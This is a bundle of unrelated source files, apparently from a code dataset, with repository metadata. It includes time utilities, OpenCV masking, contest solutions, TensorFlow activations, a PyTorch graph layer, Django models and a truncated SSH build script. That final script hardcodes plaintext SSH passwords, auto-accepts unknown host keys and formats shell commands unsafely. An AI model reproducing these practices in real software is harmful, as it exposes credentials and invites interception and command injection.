2022-08-07T17:10:15.354394
2022-07-12T00:50:16
2022-07-12T00:50:16
17,266,937
8
1
null
null
null
null
UTF-8
Python
false
false
1,170
py
from __future__ import print_function import time import datetime # Test def simplefmt_in_pdt_to_utc_epoch(moment): """Converts simple format string as if taken in PDT to UTC. This function is good for helping a developer in PDT query times in a format they're comfortable with. """ t = simplefmt_to_datetime(moment) # Add 7 hours t += datetime.timedelta(0, 25200) return datetime_to_epoch(t) def datetime_to_oddformat(moment): """Converts datetime object to format %Y-%m-%dT%H:%M:%S.%fZ""" return datetime.datetime.strftime(moment, "%Y-%m-%dT%H:%M:%S.%fZ") def oddformat_to_datetime(odd): """Converts string in %Y-%m-%dT%H:%M:%S.%fZ to datetime""" return datetime.datetime.strptime(odd, "%Y-%m-%dT%H:%M:%S.%fZ") def simplefmt_to_datetime(moment): """Converts string in %H:%M:%S %d-%m-%y to datetime""" return datetime.datetime.strptime(moment, "%H:%M:%S %d-%m-%y") def epoch_to_datetime(epoch): """Converts an epoch timestamp to datetime.""" return datetime.datetime.fromtimestamp(epoch) def datetime_to_epoch(indate): """Converts a datetime object to an epoch timestamp.""" return (indate - datetime.datetime(1970, 1, 1)).total_seconds()
6e85b271ef79c17d8c18fcf939716b7ef7bf09cc
47dd1fe92dd3b918881171c8159c2da931a43cd0
/erasing_background.py
8c0238257df9f08f233e52a1c507257cab098a12
[]
no_license
HCl3646/Ball-Recognizing
eef38c40e0ee3978c53ce61e654b91a14656f684
4707f93800b2e08401fc237b3b68d6db2e571ff1
refs/heads/main
2023-07-16T14:35:22.326111
2021-08-25T10:00:45
2021-08-25T10:00:45
390,645,050
0
0
null
null
null
null
UTF-8
Python
false
false
719
py
import cv2 import numpy as np import sys import math def afterFindCircle(src, circle): for y in range(len(src)): for x in range(len(src[y])): count = 0 for cnt in circle: formula = (y - cnt[0][1]) ** 2 + (x - cnt[0][0]) ** 2 if formula > (cnt[1])**2: count += 1 if count == len(circle): src[y][x] = 0 return src def BackGroundHSV(img, low, high): hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) hsv = cv2.GaussianBlur(hsv, (0, 0), 1.0) color_lo = np.array(low) color_hi = np.array(high) mask = cv2.inRange(hsv, color_lo, color_hi) img[mask > 0] = [0, 0, 0] return img
e58c5f71e7e0260f7e30521044465cd8a9326093
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p02778/s173819636.py
68ef04cad2b1b6d8ccded1faecc1b0de046a7534
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
46
py
S=input() l=len(S) X='x'*l X=str(X) print(X)
7a3d0337ce71f1be2261bb1b53e4460a25995c0c
a142942a91142f7139a74c3843527220caefc7e0
/model/pawns/behaviors/moving_behaviors/explorer.py
d8955a298dbd9d77476d5efc591ca34e7ed19343
[]
no_license
ME-JAD/projet-python-les-roms
2ae2c6c703e0c575d4cafba47845c38bd91cf302
7c006a1c887de2b88feb658719dc28e17de1be09
refs/heads/main
2023-06-26T00:35:21.610800
2021-07-26T08:07:21
2021-07-26T08:07:21
369,602,273
0
0
null
null
null
null
UTF-8
Python
false
false
236
py
from model.pawns.behaviors.moving_behaviors.anarchic_abstract import AnarchicAbstract class Explorer(AnarchicAbstract): def __init__(self): super().__init__(0.04) def to_string(self) -> str: return "explorer"
d183fc7c9346569cfd30247f70f6d734d228465a
54f352a242a8ad6ff5516703e91da61e08d9a9e6
/Source Codes/AtCoder/abc066/B/4898222.py
d42241014312de127729cea09494cd0e85291565
[]
no_license
Kawser-nerd/CLCDSA
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
aee32551795763b54acb26856ab239370cac4e75
refs/heads/master
2022-02-09T11:08:56.588303
2022-01-26T18:53:40
2022-01-26T18:53:40
211,783,197
23
9
null
null
null
null
UTF-8
Python
false
false
182
py
s = input() found = 0 for i in range(len(s)): if i % 2 == 0 and i >= 2: t = s[:i//2] t2 = s[i//2:i] if t == t2: found = i print(found)
f4f5cc0bfddd33da8f868b066af7b61019f05d75
0f2a9eab881c471e32b9467280633a2649519861
/tensorx/activation.py
c8e2efa1af2e090d7128861133dc4ba83f3aefe0
[ "Apache-2.0" ]
permissive
mkdir700/tensorx
97720423109ffcd5cd50c21909051e31ffca07d1
11d7727b055fbee29e122ffbfc7a39057aeeae40
refs/heads/master
2023-03-15T19:32:31.002867
2021-01-16T21:20:37
2021-01-16T21:22:25
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,062
py
import tensorflow as tf import math from tensorx.utils import as_tensor def identity(x, name: str = None) -> tf.Tensor: """ Identity function Returns a tensor with the same content as the input tensor. Args: x (`Tensor`): The input tensor. name (`str`): name for this op Returns: tensor (`Tensor`): of the same shape, type and content of the input tensor. """ return tf.identity(x, name=name) def sigmoid(x): """ Sigmoid function Element-wise sigmoid function, defined as: $$ f(x) = \\frac{1}{1 + \\exp(-x)} $$ Args: x (`Tensor`): A tensor or variable. Returns: A tensor (`Tensor`): with the result of applying the sigmoid function to the input tensor. """ return tf.nn.sigmoid(x) def hard_sigmoid(x, name="hard_sigmoid"): """ Hard Sigmoid Segment-wise linear approximation of sigmoid. (Faster than sigmoid) !!! note Approximates the sigmoid function in 3 parts: 0, scaled linear, 1. returns `0.` if `x < -2.5`, `1.` if `x > 2.5`. In `-2.5 <= x <= 2.5`, returns `0.2 * x + 0.5`. Args: x (`Tensor`): input tensor name (`str`): name for this op Returns: tensor (`Tensor): the result of applying an approximated element-wise sigmoid to the input tensor """ x = as_tensor(x) with tf.name_scope(name): slope = as_tensor(0.2, x.dtype) shift = as_tensor(0.5, x.dtype) x = (slope * x) + shift zero = as_tensor(0., x.dtype) one = as_tensor(1., x.dtype) x = tf.clip_by_value(x, zero, one) return x def tanh(x): """ Hyperbolic tangent (tanh) function. The element-wise hyperbolic tangent function is essentially a rescaled sigmoid function. The sigmoid function with range $[0,1]$ is defined as follows: $$ f(x) = \\frac{1}{1 + \\exp(-x)} $$ the hyperbolic tangent is a re-scaled function such that it's outputs range $[-1,1]$ defined as: $$ tanh(x) = 2f(2x)−1 $$ which leads us to the standard definition of hyperbolic tangent $$ tanh(x)=\\frac{e^{x}-e^{-x}}{e^{x}+e^{-x}} $$ Args: x (`Tensor`): an input tensor Returns: tensor (`Tensor`): a tensor with the result of applying the element-wise hyperbolic tangent to the input """ return tf.nn.tanh(x) def relu(x): """ relu activation A Rectifier linear unit [1] is defined as: $$ f(x)= \\max(0, x) $$ !!! cite "References" 1. (Vinod & Hinton, 2010) [Rectified linear units improve restricted boltzmann machines](https://www.cs.toronto.edu/~fritz/absps/reluICML.pdf) Args: x (`Tensor`): input tensor Returns: tensor (`Tensor`) that results in element-wise rectifier applied to x. """ return tf.nn.relu(x) def elu(x, alpha=1.0): """ elu activation An Exponential Linear Unit (ELU) is defined as: $$ f(x)=\\left\\{\\begin{array}{cc}x & x>0 \\\\ \\alpha \\cdot \\left(e^{x}-1\\right) & x<=0 \\end{array}\\right\\} $$ !!! cite "References" 1. (Clevert et al. 2015) [Fast and accurate deep network learning by exponential linear units (ELUs)](https://arxiv.org/abs/1511.07289). Args: x (`Tensor`): an input tensor alpha (`float`): A scalar, slope of positive section. Returns: tensor (`Tensor`): resulting from the application of the elu activation to the input tensor. """ y = tf.nn.elu(x) if alpha == 1: return y else: return tf.where(x > 0, y, x * y) def gelu(x, approximate: bool = True) -> tf.Tensor: """ Gaussian Error Linear Unit. Computes gaussian error linear: `0.5 * x * (1 + tanh(sqrt(2 / pi) * (x + 0.044715 * x^3)))` or `x * P(X <= x) = 0.5 * x * (1 + erf(x / sqrt(2)))`, where P(X) ~ N(0, 1), depending on whether approximation is enabled. !!! cite "References" 1. [Gaussian Error Linear Units (GELUs)](https://arxiv.org/abs/1606.08415) 2. [BERT](https://arxiv.org/abs/1810.04805). Args: x (`Tensor`): Must be one of the following types: `float16`, `float32`, `float64`. approximate (bool): whether to enable approximation. Returns: tensor (`Tensor`): with the same type as `x` """ x = tf.convert_to_tensor(x) if approximate: pi = tf.cast(tf.constant(math.pi), x.dtype) coefficient = tf.cast(0.044715, x.dtype) return 0.5 * x * (1.0 + tf.tanh(tf.sqrt(2.0 / pi) * (x + coefficient * tf.pow(x, 3)))) else: return 0.5 * x * (1.0 + tf.math.erf(x / tf.cast(tf.sqrt(2.0), x.dtype))) def selu(x): """ The Scaled Exponential Linear Unit (SELU) `scale * x` if `x > 0` and `scale * alpha * (exp(x) - 1)` if `x < 0` where alpha and scale are pre-defined constants (`alpha = 1.67326324` and `scale = 1.05070098`). The values of alpha and scale are chosen so that the mean and variance of the inputs are preserved between two consecutive layers as long as the weights are initialized correctly (see `variance_scaling_init`). To be used together with initializer = tf.variance_scaling_initializer(factor=1.0, mode='FAN_IN'). For correct dropout, use tf.contrib.nn.alpha_dropout. !!! cite "References" 1. [Self-Normalizing Neural Networks](https://arxiv.org/pdf/1706.02515.pdf) Args: x (`Tensor`): input tensor Returns: tensor (`Tensor`): results in `scale * x` if `x > 0` and `scale * alpha * (exp(x) - 1)` if `x < 0` """ return tf.nn.selu(x) def softmax(x, axis=None, name=None): """ softmax activation Softmax activation function, is equivalent to `softmax = tf.exp(logits) / tf.reduce_sum(tf.exp(logits), axis)` and it is defined as: $$ \\sigma(\\mathbf{z})_{i}=\\frac{e^{z_{i}}}{\\sum_{j=1}^{K} e^{z_{j}}} $$ Args: x (`Tensor`): input tensor axis (`int`): the dimension softmax would be performed on. The default is -1 which indicates the last dimension. name (`str`): name for this op Returns: tensor (`Tensor`): output resulting from the application of the softmax function to the input tensor """ return tf.nn.softmax(x, axis=axis, name=name) def sparsemax(logits, name: str = None) -> tf.Tensor: """Computes the sparsemax activation function [1] For each batch `i` and class `j` we have sparsemax[i, j] = max(logits[i, j] - tau(logits[i, :]), 0) References: [1]: https://arxiv.org/abs/1602.02068 Args: logits (`Tensor`): tensor with dtype: `half`, `float32`,`float64`. name (`str`): A name for the operation (optional). Returns: tensor (`Tensor`): with the same type as the input logits. """ with tf.name_scope(name, "sparsemax"): logits = tf.convert_to_tensor(logits, name="logits") obs = tf.shape(logits)[0] dims = tf.shape(logits)[1] z = logits - tf.reduce_mean(logits, axis=1)[:, tf.newaxis] # sort z z_sorted, _ = tf.nn.top_k(z, k=dims) # calculate k(z) z_cumsum = tf.cumsum(z_sorted, axis=1) k = tf.range( 1, tf.cast(dims, logits.dtype) + 1, dtype=logits.dtype) z_check = 1 + k * z_sorted > z_cumsum # because the z_check vector is always [1,1,...1,0,0,...0] finding the # (index + 1) of the last `1` is the same as just summing the number of 1. k_z = tf.reduce_sum(tf.cast(z_check, tf.int32), axis=1) # calculate tau(z) indices = tf.stack([tf.range(0, obs), k_z - 1], axis=1) tau_sum = tf.gather_nd(z_cumsum, indices) tau_z = (tau_sum - 1) / tf.cast(k_z, logits.dtype) # calculate p return tf.maximum( tf.cast(0, logits.dtype), z - tau_z[:, tf.newaxis]) __all__ = [ "identity", "sigmoid", "hard_sigmoid", "tanh", "relu", "selu", "elu", "gelu", "softmax", "sparsemax" ]
30fee447c48fbadf60c4992516d343c3172117ad
15f321878face2af9317363c5f6de1e5ddd9b749
/solutions_python/Problem_135/1920.py
90cfffa52cf142046f944f67dd669ef10263e345
[]
no_license
dr-dos-ok/Code_Jam_Webscraper
c06fd59870842664cd79c41eb460a09553e1c80a
26a35bf114a3aa30fc4c677ef069d95f41665cc0
refs/heads/master
2020-04-06T08:17:40.938460
2018-10-14T10:12:47
2018-10-14T10:12:47
null
0
0
null
null
null
null
UTF-8
Python
false
false
617
py
import sys cases = int(sys.stdin.readline()) for i in range(1,cases+1): r1 = int(sys.stdin.readline()) board1 = [] for j in range(4): board1.append(set(sys.stdin.readline().strip().split())) r2 = int(sys.stdin.readline()) board2 = [] for j in range(4): board2.append(set(sys.stdin.readline().strip().split())) solutions = board1[r1-1] & board2[r2-1] if len(solutions) == 0: print("Case #%s: Volunteer cheated!" % i) elif len(solutions) == 1: print("Case #%s: %s" % ( i, solutions.pop() )) else: print("Case #%s: Bad magician!" % i)
6edd0b38fb67914d917cc619077312985109a170
94eed60e05689e25f9070e80ad7e4fc3092d9df4
/Languages/Python/python_study_3/page10/script.py
8fdc9c00a26f834116e701e6e8cdaaafd65dbe91
[ "MIT" ]
permissive
myarist/Progate
0998e79f786db7a93ebd7488494427c3156729c7
0132583c989b5ec1805d4de1a6f6861586cf152e
refs/heads/main
2023-05-09T05:52:12.476226
2021-06-07T21:26:48
2021-06-07T21:26:48
363,348,949
13
17
null
null
null
null
UTF-8
Python
false
false
734
py
def validate(hand): if hand < 0 or hand > 2: return False return True def print_hand(hand, name='Tamu'): hands = ['Batu', 'Kertas', 'Gunting'] print(name + ' memilih: ' + hands[hand]) print('Memulai permainan Batu Kertas Gunting!') player_name = input('Masukkan nama Anda: ') print('Pilih tangan: (0: Batu, 1: Kertas, 2: Gunting)') player_hand = int(input('Masukkan nomor (0-2): ')) if validate(player_hand): # Tetapkan 1 ke variable computer_hand computer_hand = 1 print_hand(player_hand, player_name) # Panggil function print_hand dengan computer_hand dan 'Komputer' sebagai argument print_hand(computer_hand, 'Komputer') else: print('Mohon masukkan nomor yang benar')
1505ecdc491bd9721b4650ce6eda55cdbee0446a
fdefd1f4b402620d7a9cc1f5ca8ed522c54bec4a
/torch_geometric/nn/conv/dna_conv.py
2b90319e7c9fa0d0e6415824ba077d9d74642c10
[ "MIT" ]
permissive
Lotayou/pytorch_geometric
75f9ee187503fed9b70a800e5d768ecb91719d9f
09ef8e3a510de3336f092a5dc1ede290b1c5cdb8
refs/heads/master
2020-05-07T22:24:52.701826
2019-04-12T05:24:52
2019-04-12T05:24:52
174,668,900
1
0
MIT
2019-03-09T08:36:42
2019-03-09T08:36:41
null
UTF-8
Python
false
false
9,892
py
from __future__ import division import math import torch from torch import Tensor from torch.nn import Parameter import torch.nn.functional as F from torch_geometric.nn.conv import MessagePassing, GCNConv from ..inits import uniform, kaiming_uniform class Linear(torch.nn.Module): def __init__(self, in_channels, out_channels, groups=1, bias=True): super(Linear, self).__init__() assert in_channels % groups == 0 and out_channels % groups == 0 self.in_channels = in_channels self.out_channels = out_channels self.groups = groups self.weight = Parameter( Tensor(groups, in_channels // groups, out_channels // groups)) if bias: self.bias = Parameter(torch.Tensor(out_channels)) else: self.register_parameter('bias', None) self.reset_parameters() def reset_parameters(self): kaiming_uniform(self.weight, fan=self.weight.size(1), a=math.sqrt(5)) uniform(self.weight.size(1), self.bias) def forward(self, src): # Input: [*, in_channels] # Output: [*, out_channels] if self.groups > 1: size = list(src.size())[:-1] src = src.view(-1, self.groups, self.in_channels // self.groups) src = src.transpose(0, 1).contiguous() out = torch.matmul(src, self.weight) out = out.transpose(1, 0).contiguous() out = out.view(*size, self.out_channels) else: out = torch.matmul(src, self.weight.squeeze(0)) if self.bias is not None: out += self.bias return out def __repr__(self): # pragma: no cover return '{}({}, {}, groups={}, bias={})'.format( self.__class__.__name__, self.in_channels, self.out_channels, self.groups, self.bias is not None) def restricted_softmax(src, dim=-1, margin=0): src_max = torch.clamp(src.max(dim=dim, keepdim=True)[0], min=0) out = (src - src_max).exp() out = out / (out.sum(dim=dim, keepdim=True) + (margin - src_max).exp()) return out class Attention(torch.nn.Module): def __init__(self, dropout=0): super(Attention, self).__init__() self.dropout = dropout def forward(self, query, key, value): # Query: [*, query_entries, dim_k] # Key: [*, key_entries, dim_k] # Value: [*, key_entries, dim_v] # Output: [*, query_entries, dim_v] assert query.dim() == key.dim() == value.dim() >= 2 assert query.size(-1) == key.size(-1) assert key.size(-2) == value.size(-2) # Score: [*, query_entries, key_entries] score = torch.matmul(query, key.transpose(-2, -1)) score = score / math.sqrt(key.size(-1)) score = restricted_softmax(score, dim=-1) if self.dropout > 0: score = F.dropout(score, p=self.dropout, training=self.training) return torch.matmul(score, value) def __repr__(self): # pragma: no cover return '{}(dropout={})'.format(self.__class__.__name__, self.dropout) class MultiHead(Attention): def __init__(self, in_channels, out_channels, heads=1, groups=1, dropout=0, bias=True): super(MultiHead, self).__init__(dropout) self.in_channels = in_channels self.out_channels = out_channels self.heads = heads self.groups = groups self.bias = bias assert in_channels % heads == 0 and out_channels % heads == 0 assert in_channels % groups == 0 and out_channels % groups == 0 assert max(groups, self.heads) % min(groups, self.heads) == 0 self.lin_q = Linear(in_channels, out_channels, groups, bias) self.lin_k = Linear(in_channels, out_channels, groups, bias) self.lin_v = Linear(in_channels, out_channels, groups, bias) self.reset_parameters() def reset_parameters(self): self.lin_q.reset_parameters() self.lin_k.reset_parameters() self.lin_v.reset_parameters() def forward(self, query, key, value): # Query: [*, query_entries, in_channels] # Key: [*, key_entries, in_channels] # Value: [*, key_entries, in_channels] # Output: [*, query_entries, out_channels] assert query.dim() == key.dim() == value.dim() >= 2 assert query.size(-1) == key.size(-1) == value.size(-1) assert key.size(-2) == value.size(-2) query = self.lin_q(query) key = self.lin_k(key) value = self.lin_v(value) # Query: [*, heads, query_entries, out_channels // heads] # Key: [*, heads, key_entries, out_channels // heads] # Value: [*, heads, key_entries, out_channels // heads] size = list(query.size())[:-2] out_channels_per_head = self.out_channels // self.heads query = query.view(*size, query.size(-2), self.heads, out_channels_per_head).transpose(-2, -3) key = key.view(*size, key.size(-2), self.heads, out_channels_per_head).transpose(-2, -3) value = value.view(*size, value.size(-2), self.heads, out_channels_per_head).transpose(-2, -3) # Output: [*, heads, query_entries, out_channels // heads] out = super(MultiHead, self).forward(query, key, value) # Output: [*, query_entries, heads, out_channels // heads] out = out.transpose(-3, -2).contiguous() # Output: [*, query_entries, out_channels] out = out.view(*size, query.size(-2), self.out_channels) return out def __repr__(self): # pragma: no cover return '{}({}, {}, heads={}, groups={}, dropout={}, bias={})'.format( self.__class__.__name__, self.in_channels, self.out_channels, self.heads, self.groups, self.dropout, self.bias) class DNAConv(MessagePassing): r"""The dynamic neighborhood aggregation operator from the `"Just Jump: Towards Dynamic Neighborhood Aggregation in Graph Neural Networks" <https://arxiv.org/abs/1904.04849>`_ paper .. math:: \mathbf{x}_v^{(t)} = h_{\mathbf{\Theta}}^{(t)} \left( \mathbf{x}_{v \leftarrow v}^{(t)}, \left\{ \mathbf{x}_{v \leftarrow w}^{(t)} : w \in \mathcal{N}(v) \right\} \right) based on (multi-head) dot-product attention .. math:: \mathbf{x}_{v \leftarrow w}^{(t)} = \textrm{Attention} \left( \mathbf{x}^{(t-1)}_v \, \mathbf{\Theta}_Q^{(t)}, [\mathbf{x}_w^{(1)}, \ldots, \mathbf{x}_w^{(t-1)}] \, \mathbf{Q}_K^{(t)}, \, [\mathbf{x}_w^{(1)}, \ldots, \mathbf{x}_w^{(t-1)}] \, \mathbf{Q}_V^{(t)} \right) with :math:`\mathbf{\Theta}_Q^{(t)}, \mathbf{\Theta}_K^{(t)}, \mathbf{\Theta}_V^{(t)}` denoting (grouped) projection matrices for query, key and value information, respectively. :math:`h^{(t)}_{\mathbf{\Theta}}` is implemented as a non-trainable version of :class:`torch_geometric.nn.conv.GCNConv`. .. note:: In contrast to other layers, this operator expects node features as shape :obj:`[num_nodes, num_layers, channels]`. Args: channels (int): Size of each input/output sample. heads (int, optional): Number of multi-head-attentions. (default: :obj:`1`) groups (int, optional): Number of groups to use for all linear projections. (default: :obj:`1`) dropout (float, optional): Dropout probability of attention coefficients. (default: :obj:`0`) cached (bool, optional): If set to :obj:`True`, the layer will cache the computation of :math:`{\left(\mathbf{\hat{D}}^{-1/2} \mathbf{\hat{A}} \mathbf{\hat{D}}^{-1/2} \right)}`. (default: :obj:`False`) bias (bool, optional): If set to :obj:`False`, the layer will not learn an additive bias. (default: :obj:`True`) """ def __init__(self, channels, heads=1, groups=1, dropout=0, cached=False, bias=True): super(DNAConv, self).__init__('add') self.bias = bias self.cached = cached self.cached_result = None self.multi_head = MultiHead(channels, channels, heads, groups, dropout, bias) self.reset_parameters() def reset_parameters(self): self.multi_head.reset_parameters() self.cached_result = None def forward(self, x, edge_index, edge_weight=None): """""" # X: [num_nodes, num_layers, channels] # Edge Index: [2, num_edges] # Edge Weight: [num_edges] if x.dim() != 3: raise ValueError('Feature shape must be [num_nodes, num_layers, ' 'channels].') num_nodes, num_layers, channels = x.size() if not self.cached or self.cached_result is None: edge_index, norm = GCNConv.norm( edge_index, x.size(0), edge_weight, dtype=x.dtype) self.cached_result = edge_index, norm edge_index, norm = self.cached_result return self.propagate(edge_index, x=x, norm=norm) def message(self, x_i, x_j, norm): # X_i: [num_edges, num_layers, channels] # X_j: [num_edges, num_layers, channels] # Norm: [num_edges] # Output: [num_edges, channels] x_i = x_i[:, -1:] # [num_edges, 1, channels] out = self.multi_head(x_i, x_j, x_j) # [num_edges, 1, channels] return norm.view(-1, 1) * out.squeeze(1) def __repr__(self): return '{}({}, heads={}, groups={})'.format( self.__class__.__name__, self.multi_head.in_channels, self.multi_head.heads, self.multi_head.groups)
fa5290467644a2b4bf1c09544db265e9187a3b94
6293491133e816f6148d576639f21348f8f19297
/main/models/legacy.py
dd4cf540dfae6daf01225a5085e3e09b1ce6366c
[ "MIT" ]
permissive
BAMRU-Tech/bamru_net
0f6539973fb4eb088d76f50f491c2c1b74edd35b
b988b6e41c786448c4a8a76c11397d195f802a26
refs/heads/main
2023-07-24T14:09:59.712325
2023-07-11T06:37:07
2023-07-11T06:37:07
149,375,227
7
3
MIT
2023-07-11T06:39:00
2018-09-19T01:38:59
Python
UTF-8
Python
false
false
5,554
py
##################################################################### # Models below this line have not been looked at ##################################################################### class DataFiles(models.Model): id = models.IntegerField(primary_key=True) # AutoField? member_id = models.IntegerField(blank=True, null=True) download_count = models.IntegerField(blank=True, null=True) data_file_extension = models.TextField(blank=True, null=True) # This field type is a guess. data_file_name = models.TextField(blank=True, null=True) # This field type is a guess. data_file_size = models.TextField(blank=True, null=True) # This field type is a guess. data_content_type = models.TextField(blank=True, null=True) # This field type is a guess. data_updated_at = models.TextField(blank=True, null=True) # This field type is a guess. created_at = models.DateTimeField(blank=True, null=True) updated_at = models.DateTimeField(blank=True, null=True) killme1 = models.IntegerField(blank=True, null=True) killme2 = models.IntegerField(blank=True, null=True) caption = models.TextField(blank=True, null=True) # This field type is a guess. published = models.NullBooleanField() class DataLinks(models.Model): id = models.IntegerField(primary_key=True) # AutoField? member_id = models.IntegerField(blank=True, null=True) site_url = models.TextField(blank=True, null=True) # This field type is a guess. caption = models.TextField(blank=True, null=True) # This field type is a guess. published = models.NullBooleanField() link_backup_file_name = models.TextField(blank=True, null=True) # This field type is a guess. link_backup_content_type = models.TextField(blank=True, null=True) # This field type is a guess. link_backup_file_size = models.IntegerField(blank=True, null=True) link_backup_updated_at = models.IntegerField(blank=True, null=True) position = models.IntegerField(blank=True, null=True) created_at = models.DateTimeField() updated_at = models.DateTimeField() class DataPhotos(models.Model): id = models.IntegerField(primary_key=True) # AutoField? member_id = models.IntegerField(blank=True, null=True) caption = models.TextField(blank=True, null=True) # This field type is a guess. image_file_name = models.TextField(blank=True, null=True) # This field type is a guess. image_content_type = models.TextField(blank=True, null=True) # This field type is a guess. image_file_size = models.IntegerField(blank=True, null=True) image_updated_at = models.IntegerField(blank=True, null=True) position = models.IntegerField(blank=True, null=True) published = models.NullBooleanField() created_at = models.DateTimeField() updated_at = models.DateTimeField() class EventFiles(models.Model): id = models.IntegerField(primary_key=True) # AutoField? event_id = models.IntegerField(blank=True, null=True) data_file_id = models.IntegerField(blank=True, null=True) keyval = models.TextField(blank=True, null=True) created_at = models.DateTimeField() updated_at = models.DateTimeField() class EventLinks(models.Model): id = models.IntegerField(primary_key=True) # AutoField? event_id = models.IntegerField(blank=True, null=True) data_link_id = models.IntegerField(blank=True, null=True) keyval = models.TextField(blank=True, null=True) created_at = models.DateTimeField() updated_at = models.DateTimeField() class EventPhotos(models.Model): id = models.IntegerField(primary_key=True) # AutoField? event_id = models.IntegerField(blank=True, null=True) data_photo_id = models.IntegerField(blank=True, null=True) keyval = models.TextField(blank=True, null=True) created_at = models.DateTimeField() updated_at = models.DateTimeField() class EventReports(models.Model): id = models.IntegerField(primary_key=True) # AutoField? typ = models.TextField(blank=True, null=True) # This field type is a guess. member_id = models.IntegerField(blank=True, null=True) event_id = models.IntegerField(blank=True, null=True) period_id = models.IntegerField(blank=True, null=True) title = models.TextField(blank=True, null=True) # This field type is a guess. data = models.TextField(blank=True, null=True) position = models.IntegerField(blank=True, null=True) published = models.NullBooleanField() created_at = models.DateTimeField() updated_at = models.DateTimeField() ################ Old messaging ########################### class Rsvps(models.Model): id = models.IntegerField(primary_key=True) # AutoField? message_id = models.IntegerField(blank=True, null=True) prompt = models.TextField(blank=True, null=True) # This field type is a guess. yes_prompt = models.TextField(blank=True, null=True) # This field type is a guess. no_prompt = models.TextField(blank=True, null=True) # This field type is a guess. created_at = models.DateTimeField(blank=True, null=True) updated_at = models.DateTimeField(blank=True, null=True) class Journals(models.Model): id = models.IntegerField(primary_key=True) # AutoField? member_id = models.IntegerField(blank=True, null=True) distribution_id = models.IntegerField(blank=True, null=True) action = models.TextField(blank=True, null=True) # This field type is a guess. created_at = models.DateTimeField(blank=True, null=True) updated_at = models.DateTimeField(blank=True, null=True)
5e9e628a0571d892088ff32b1a6315611dcec60e
5ab78eb2f4f17337f9e8b6a90e588aaba6af4a90
/work/auto_make_iso.py
685dc4c8924bfea5ff8431c946d8ec46dd276f11
[]
no_license
swl5571147a/stone
3946dbdba2315bb9f75495a1efcbe713e4c72324
d75538601e992fec000adf0550f9ac54fa326e18
refs/heads/master
2021-01-21T00:20:55.272706
2014-05-26T15:41:16
2014-05-26T15:41:16
null
0
0
null
null
null
null
UTF-8
Python
false
false
12,701
py
#!/usr/bin/env python import paramiko,os,sys,commands,time from subprocess import Popen, PIPE import shlex #set the default configure and argvs current_time = time.strftime('%Y-%m-%d-%H-%M-%S',time.localtime(time.time())) conf = {'path_mcu':'/home/broad/sunwenlong/iserver-mcu/medooze', 'path_mcuWeb':'', 'path_siremis':'/home/broad/sunwenlong/iserver-sipserver', 'path_source':'/home/broad/sunwenlong/source', 'port':22, 'remote_ip':'192.168.1.100', 'root':'broadeng', 'broad':'broad123', 'path_sql':'/home/broad/sunwenlong/iserver-sipserver/config' } def ssh_get_source(remote_ip,port,user,passwd): '''set the ssh-connect for gettiing the source''' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(remote_ip,port,user,passwd) return ssh def ssh_down_load(remote_ip,port,user,passwd): '''set the ssh-connect for down load the tar_source''' ssh = paramiko.Transport((remote_ip,port)) ssh.connect(username=user,password=passwd) return ssh def git_update_tar(ssh,path,file_name): '''To update the git from gitserver and tar the target dir to filename-current_time.tar.gz''' cmd = 'cd %s && git pull && tar zcvf %s-%s.tar.gz %s'%(path,file_name,current_time, file_name) try: stdin,stdout,stderr = ssh.exec_command(cmd) print '%s backup OK'%file_name except: print 'Error! %s backup error'%file_name if not len(stderr.read()) == 0: print stderr.read() ssh.close() def scp_source(ssh,path,file_name): '''From the source to down load the tar file''' sftp = paramiko.SFTPClient.from_transport(ssh) remote_path = '%s/%s-%s.tar.gz'%(path,file_name,current_time) local_path = '%s/%s-%s.tar.gz'%(conf['path_source'],file_name,current_time) try: s = sftp.get(remote_path,local_path) print 'OK! %s download sucessfully!'%file_name except: print 'Error! %s could not download!'%file_name ssh.close() def clean_source(ssh,path,file_name): '''To clean the tar file in the source dir''' cmd = 'rm -f %s/%s-%s.tar.gz'%(path,file_name,current_time) stdin,stdout,stderr = ssh.exec_command(cmd) if not stderr.readlines(): print '%s-%s.tar.gz clean up from remote'%(file_name,current_time) else: print 'Error! %s-%s.tar.gz clean up error'%(file_name,current_time) def tar_zxvf(file_name): '''To tar zxvf the tar_file_name ''' dir_path = os.path.join(conf['path_source'], file_name) err_rm = clean_old_dir(dir_path) print_err(err_rm) tar_path = os.path.join(conf['path_source'], '%s-%s.tar.gz')%(file_name,current_time) tar_file = '%s-%s.tar.gz'%(file_name,current_time) tar_cmd = 'cd %s && tar zxvf %s'%(conf['path_source'], tar_file) if os.path.exists(tar_path): try: subf_tar = Popen(tar_cmd, stdout=PIPE, stderr=PIPE, shell=True) err_tar = subf_tar.stderr.read() if not err_tar: print 'tar zxvf %s is OK!'%tar_file except: err_tar = 'Error! The command of tar zxvf %s clould not be done!Please check it!'%(tar_file) else: print 'Error! The file of %s is not exists!Please check it in dir:%s'%(file_name, conf['path_source']) print_err(err_tar) def mcu_make(): '''To make the new mcu and replace the old mcu''' make_path = os.path.join(conf['path_source'], 'mcu') print 'It will take some minutes,Please wait ......' if not os.path.exists(make_path): print 'Error! The dir mcu clould not be found! Please chech it in dir:/home/broad/sunwenlong/source ' else: make_cmd = 'cd %s && sudo make'%make_path try: subf = Popen(make_cmd, stdout=PIPE, stderr=PIPE, shell=True) err_make = subf.stderr.read() if not err_make: print 'make mcu OK!' except: err_make = 'Error! The mcu_make_cmd cloud not be done!' print_err(err_make) make_mcu_path = os.path.join(make_path, 'bin/release') new_mcu = os.path.join(make_mcu_path, 'mcu') old_mcu_path = '/usr/local/bin' old_mcu = '/usr/local/bin/mcu' if os.path.exists(new_mcu): rm_cmd = 'rm -f %s'%old_mcu cp_cmd = 'cp %s %s'%(new_mcu, old_mcu_path) try: subf_rm = Popen(rm_cmd, stdout=PIPE, stderr=PIPE, shell=True) subf_cp = Popen(cp_cmd, stdout=PIPE, stderr=PIPE, shell=True) err_rm = subf_rm.stderr.read() err_cp = subf_cp.stderr.read() if not err_rm: print 'OK! The command of remove the old 